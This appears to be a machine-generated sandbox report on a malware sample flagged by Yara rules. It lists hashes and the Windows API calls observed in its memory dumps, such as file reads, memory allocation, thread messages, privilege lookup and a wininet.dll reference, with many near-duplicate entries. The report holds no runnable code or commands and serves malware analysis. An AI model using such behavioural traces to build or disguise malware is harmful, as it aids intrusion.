                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Executed Functions

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,009C3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,009C3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 009C863D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              • Opcode ID: 5aee022c4400e3bbb3b2779a8a6bf946f6bc223c726bbc2bc2758f843e2958f2
                                                              • Instruction ID: 03aa55e39d829b92bda756992af2529880bdad6fe93e2f0baa1626a1fc04c99e
                                                              • Opcode Fuzzy Hash: 5aee022c4400e3bbb3b2779a8a6bf946f6bc223c726bbc2bc2758f843e2958f2
                                                              • Instruction Fuzzy Hash: 3911B0B2604209AFCB58DF98DC85EEB73EDFF8C354B148649FA1D97241D630E8118BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,009C3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,009C3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 009C863D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction ID: 2a5f26021ac597defdbfdc11952a9c5ea74411216a18ac8190ce1af0e79f8137
                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction Fuzzy Hash: 50F0BDB2204208AFCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630F811CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtReadFile.NTDLL(009C3D82,5E972F65,FFFFFFFF,009C3A41,?,?,009C3D82,?,009C3A41,FFFFFFFF,5E972F65,009C3D82,?,00000000), ref: 009C86E5
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: ad2cb814f409d2dd0b9b9ef7845ec354332011fccff35e20e5e56bc4d5af520a
                                                              • Instruction ID: a1be4ab648eb26c5bf000f9770dd0fc12d2fdb0b597234a4333241e98073f1f5
                                                              • Opcode Fuzzy Hash: ad2cb814f409d2dd0b9b9ef7845ec354332011fccff35e20e5e56bc4d5af520a
                                                              • Instruction Fuzzy Hash: 9AF0F9B2204209AFCB08DF89DC85EEB77A9FF8D354F058248BE0D97241C630E811CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtReadFile.NTDLL(009C3D82,5E972F65,FFFFFFFF,009C3A41,?,?,009C3D82,?,009C3A41,FFFFFFFF,5E972F65,009C3D82,?,00000000), ref: 009C86E5
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction ID: 76681fe9405ae8e394bd556c0e1a20549e496cde8873c7e303d8bf6a039d9e7b
                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction Fuzzy Hash: 74F0A4B2200208AFCB14DF89DC85EEB77ADAF8C754F158248BE1D97241D630E811CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,009B2D11,00002000,00003000,00000004), ref: 009C8809
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: d4378115886cc9fa9c78e8e0604900f2eaab6176d32ac93e17e46c1071dfed7a
                                                              • Instruction ID: 9eb706393b42f9116588ae6ecd28ad5a7c39197a0d74cdc0ee567b8244e99535
                                                              • Opcode Fuzzy Hash: d4378115886cc9fa9c78e8e0604900f2eaab6176d32ac93e17e46c1071dfed7a
                                                              • Instruction Fuzzy Hash: E4F0F2B2210208AFDB14DF88DC85EAB77ADEF88750F158148BE1997241C630F910CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,009B2D11,00002000,00003000,00000004), ref: 009C8809
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction ID: 8f5940488266d34a4837bcb36118d460be9f5261d781283127391056c5cb19f8
                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction Fuzzy Hash: 5FF015B2200208AFCB14DF89CC85EAB77ADAF88750F158148BE0897241C630F810CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtClose.NTDLL(009C3D60,?,?,009C3D60,00000000,FFFFFFFF), ref: 009C8745
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 42a55109f66f3fdadcba629e491d80c85a6d331cedeb551f21baebc2a1cc987d
                                                              • Instruction ID: 2c2628d61edb242fea2277c744224b41cc1be887b4abcfe08410257d8da7a8bd
                                                              • Opcode Fuzzy Hash: 42a55109f66f3fdadcba629e491d80c85a6d331cedeb551f21baebc2a1cc987d
                                                              • Instruction Fuzzy Hash: 71E08C75204214ABD710EFA8CC89F977B69EF44720F044199BA985B282C630F60087D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtClose.NTDLL(009C3D60,?,?,009C3D60,00000000,FFFFFFFF), ref: 009C8745
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction ID: 6c0d89454f620bffd642214bc5a4ce7a2450af8ec270667d23a4814322696839
                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction Fuzzy Hash: 08D01275600214ABD710EB98CC89F97775CEF44750F154459BA185B242C530F50087E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3ad41815f0f43508aa78d5c72f0946b80b882b22ee10bb6965e7bc3251c6f7bc
                                                              • Instruction ID: 7c5095e3853bd71901c3eb0b8741dc8f9decaea92770b6dc3a9e086939cc886e
                                                              • Opcode Fuzzy Hash: 3ad41815f0f43508aa78d5c72f0946b80b882b22ee10bb6965e7bc3251c6f7bc
                                                              • Instruction Fuzzy Hash: 6790027220100513F111615B4504727000DD7D02C5F91C456A4415568D97D6D962B161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ec8eaddfe02b466c42bd306feebc413025e0e4746081152010dfb02744152079
                                                              • Instruction ID: b64b58ce2e1d2d6b8d00423ffcf2a8272a0e72d545d53527109ebedf3b095196
                                                              • Opcode Fuzzy Hash: ec8eaddfe02b466c42bd306feebc413025e0e4746081152010dfb02744152079
                                                              • Instruction Fuzzy Hash: 8F900262242042527545B15B4404527400AE7E02C5791C056A5405960C86A6E866E661
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 45577d17f4c503d851b9650b729e2e427a76c07ac7d4a094c583cd1918c18d5d
                                                              • Instruction ID: 1c61a90667de30aae65d1568d0661085ecaca202d4328cf878fa248f322948ec
                                                              • Opcode Fuzzy Hash: 45577d17f4c503d851b9650b729e2e427a76c07ac7d4a094c583cd1918c18d5d
                                                              • Instruction Fuzzy Hash: CC9002A234100542F100615B4414B260009D7E1385F51C059E5055564D8799DC627166
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 490aca31ce8d3b0bda408cd9ee2aed77981c5ddd12a2035b74a5b1b310450618
                                                              • Instruction ID: a9f5de11883dfd4de7a6c5234e6bd8e32c96dd34678150dac1cf430d9cd58794
                                                              • Opcode Fuzzy Hash: 490aca31ce8d3b0bda408cd9ee2aed77981c5ddd12a2035b74a5b1b310450618
                                                              • Instruction Fuzzy Hash: 3D9002A2202001036105715B4414636400ED7E0285B51C065E50055A0DC6A5D8A17165
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 51662246bb87337cf0d7c0e358ae5bfd84b92af0a351a0fb048742311aa9cd33
                                                              • Instruction ID: 307cf968eaff5753f194733837797794aafa2bed07c7edb161acb2f54c567b15
                                                              • Opcode Fuzzy Hash: 51662246bb87337cf0d7c0e358ae5bfd84b92af0a351a0fb048742311aa9cd33
                                                              • Instruction Fuzzy Hash: 789002B220100502F140715B44047660009D7D0385F51C055A9055564E87D9DDE576A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5c3923b0a28e7d748687fcaa729683b4afec54af9efc64ac7ca8609586a432ab
                                                              • Instruction ID: 674813185d02b6000b2cf10c351803f16bebcefa5243cf95fc9d042b32bb0b9b
                                                              • Opcode Fuzzy Hash: 5c3923b0a28e7d748687fcaa729683b4afec54af9efc64ac7ca8609586a432ab
                                                              • Instruction Fuzzy Hash: 1D900266211001032105A55B0704527004AD7D53D5351C065F5006560CD7A1D8716161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a61ac9451054653e99b122f89af85b51c3442f0385fe9750764848f58961d321
                                                              • Instruction ID: a83ec1ba0a2e31722a32aad6a449cde440e70e8a720052217d40556eb190cbe1
                                                              • Opcode Fuzzy Hash: a61ac9451054653e99b122f89af85b51c3442f0385fe9750764848f58961d321
                                                              • Instruction Fuzzy Hash: D590027220108902F110615B840476A0009D7D0385F55C455A8415668D87D5D8A17161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f44a8cfee5a1ab7c4c692b79784f5d4c4d1f929b31f2d66cb633535681fa5696
                                                              • Instruction ID: 7085317934fb8c2841ca5bf38beab0b00d60664fe17985df837082a408b4a833
                                                              • Opcode Fuzzy Hash: f44a8cfee5a1ab7c4c692b79784f5d4c4d1f929b31f2d66cb633535681fa5696
                                                              • Instruction Fuzzy Hash: A290027220100942F100615B4404B660009D7E0385F51C05AA4115664D8795D8617561
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c24f2eacae1c7fc812ef34e72f13298da2840ec14c0729af13df412609440900
                                                              • Instruction ID: b976dacdf855afc1d0793cd3393c0763d7d28157a5940a3fa0e89199982508ba
                                                              • Opcode Fuzzy Hash: c24f2eacae1c7fc812ef34e72f13298da2840ec14c0729af13df412609440900
                                                              • Instruction Fuzzy Hash: FC90027220100902F180715B440466A0009D7D1385F91C059A4016664DCB95DA6977E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 80f0aa24a42afcd15c15b2aef9f3a01621ef3675fafb6d7d7c40635fb6742075
                                                              • Instruction ID: 71f33b11e48c9a10424fabfbab11876d6fa046036a8c5ac682d9f1ae35bd3bc9
                                                              • Opcode Fuzzy Hash: 80f0aa24a42afcd15c15b2aef9f3a01621ef3675fafb6d7d7c40635fb6742075
                                                              • Instruction Fuzzy Hash: B290027220504942F140715B4404A660019D7D0389F51C055A40556A4D97A5DD65B6A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 919bab381a5ed81d1bdbec6ac04a2c42f0de134bd2c5b637e7fe907daea95503
                                                              • Instruction ID: 1699adfcc3d30ed5abada29abcc7dd27c6ada7d9138af331a68b65cef626e0ce
                                                              • Opcode Fuzzy Hash: 919bab381a5ed81d1bdbec6ac04a2c42f0de134bd2c5b637e7fe907daea95503
                                                              • Instruction Fuzzy Hash: FA90026221180142F200656B4C14B270009D7D0387F51C159A4145564CCA95D8716561
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bee0b732c3a896a2a38d78dc4364dad60e64ce603e92da68f0afa7fa65a130ec
                                                              • Instruction ID: 0e552a7145c419a85bca768d11eff0b83c9ed23ff2a75eed0e983a8d3bdab579
                                                              • Opcode Fuzzy Hash: bee0b732c3a896a2a38d78dc4364dad60e64ce603e92da68f0afa7fa65a130ec
                                                              • Instruction Fuzzy Hash: 0D90026A21300102F180715B540862A0009D7D1286F91D459A4006568CCA95D8796361
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 03761938c8b3b005ce937adae894c5b8c7a919e11ea5e118e78b21b04ffdd4a3
                                                              • Instruction ID: 5c198aa1c49f7bea1ba2632645fbfaf4a933a4a1f9016c52b04842a9a32ae968
                                                              • Opcode Fuzzy Hash: 03761938c8b3b005ce937adae894c5b8c7a919e11ea5e118e78b21b04ffdd4a3
                                                              • Instruction Fuzzy Hash: 7C90027231114502F110615B84047260009D7D1285F51C455A4815568D87D5D8A17162
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c233c7c8e80978e3cbbacf509e3c65d059285098e6ddced6f660590dc36773f8
                                                              • Instruction ID: 457baffb7426cb7407031a6da53c546a355b8b4bb652290655637b0a48afe421
                                                              • Opcode Fuzzy Hash: c233c7c8e80978e3cbbacf509e3c65d059285098e6ddced6f660590dc36773f8
                                                              • Instruction Fuzzy Hash: 6390027220100502F100659B54086660009D7E0385F51D055A9015565EC7E5D8A17171
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 009C73B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: 538abed265c5d158ddd0c2efc6e16d8eadf2debc70b5946eeebfa6a3d8b33158
                                                              • Instruction ID: be25e736c24eed7aa2be51c4110951297717d9fd0c72a11417f434ad15463c4c
                                                              • Opcode Fuzzy Hash: 538abed265c5d158ddd0c2efc6e16d8eadf2debc70b5946eeebfa6a3d8b33158
                                                              • Instruction Fuzzy Hash: F131C1B6906604ABC715EFA8D8A1FA7F7B8FF88700F00851DFA195B241D730A505CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 009C73B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: c1e70bed72840f0be07efcf27c933c7db6d171afac49572a70e67c86daba27a4
                                                              • Instruction ID: 0a7f59433b28de77e401df21cdddbe9f8f8b294a9db2a85a9501177945e00a0e
                                                              • Opcode Fuzzy Hash: c1e70bed72840f0be07efcf27c933c7db6d171afac49572a70e67c86daba27a4
                                                              • Instruction Fuzzy Hash: 0B21A571905604AFC714EFA8D8A1F67BBB8FF88700F04811DFA195B242D774A555CBE2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,009B3B93), ref: 009C892D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              • Opcode ID: d7533aa486eb550469600c3ff4c0fec234e0fdf65481c1d5e079853eb1ec7261
                                                              • Instruction ID: 62bfb4954c83911bc952e9f5e9fc9693accc8a7d47c67d8b30b8677b7fd3f279
                                                              • Opcode Fuzzy Hash: d7533aa486eb550469600c3ff4c0fec234e0fdf65481c1d5e079853eb1ec7261
                                                              • Instruction Fuzzy Hash: 13E0CDBA5083889FD710EFB49C81D977794AF84304725425DEC5943743D171E51ACBB6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,009B3B93), ref: 009C892D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                              • Instruction ID: ac1290946a5c99e99f21e3c6d836a9f225c9ced604c2892c57a0da0e4936c058
                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                              • Instruction Fuzzy Hash: 02E012B1200208ABDB18EF99CC89EA777ACAF88750F018558BE085B242C630F910CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009B72EA
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009B730B
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 50c2719ecc71168c05a282878d75e1f23ebe94d7e21c245d1d402737f6e7ee49
                                                              • Instruction ID: 185c2a1a8eac025f895348954bef7492006c86a69a5ceada620f24fa8a2b940b
                                                              • Opcode Fuzzy Hash: 50c2719ecc71168c05a282878d75e1f23ebe94d7e21c245d1d402737f6e7ee49
                                                              • Instruction Fuzzy Hash: 8F014932E8012876EB10AA94AC03FFEB768AB80F21F04425DFF08EA1C1D694590243E2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009B72EA
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009B730B
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                              • Instruction ID: 616226daccfe0d906697a6d516435bf485bce28bc97834377af0597b67f6ca0e
                                                              • Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                              • Instruction Fuzzy Hash: 8F01A231E902287BEB21A6949D43FFE776C9B81F61F044118FF04BA1C1E6946A0647F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,009BCFD2,009BCFD2,?,00000000,?,?), ref: 009C8A90
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 14ee64eb35eb02df3414a7f65c6bbcdb00cb8d03778a61d5bb85439dc82179f0
                                                              • Instruction ID: 08f1235237d34e0d03511373c34734d7705570b32e0e18116e5e120904e3b54e
                                                              • Opcode Fuzzy Hash: 14ee64eb35eb02df3414a7f65c6bbcdb00cb8d03778a61d5bb85439dc82179f0
                                                              • Instruction Fuzzy Hash: 920124B5200208AFCB14DF88DC81EEB77A9EF88310F158159FE1897242CA30E9118BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
